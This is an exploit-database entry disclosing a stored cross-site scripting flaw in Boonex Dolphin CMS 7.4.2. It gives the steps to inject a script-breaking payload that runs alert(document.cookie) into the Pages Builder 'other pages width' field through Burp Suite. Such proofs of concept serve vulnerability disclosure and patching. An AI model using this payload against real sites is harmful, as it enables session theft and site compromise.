15 lines
No EOL
577 B
Text
15 lines
No EOL
577 B
Text
# Exploit Title: Boonex Dolphin 7.4.2 - 'width' Stored XSS
|
|
# Date: 18-03-2021
|
|
# Exploit Author: Piyush Patil
|
|
# Vendor Homepage: https://www.boonex.com/
|
|
# Software Link: https://www.boonex.com/downloads
|
|
# Version: 7.4.2
|
|
# Tested on: Windows 10
|
|
|
|
# Reference - https://github.com/xoffense/POC/blob/main/Boonex%20Dolphin%20CMS%207.4.2%20%20stored%20XSS
|
|
|
|
Steps to Reproduce Bug:
|
|
1- Login to Admin Panel
|
|
2- Goto "Builders" => "Pages Builder"
|
|
3- Select any page
|
|
4- Turn on Burp Suite Intercept and Change "other pages width" to "1081px</script><script>alert(document.cookie)</script>" |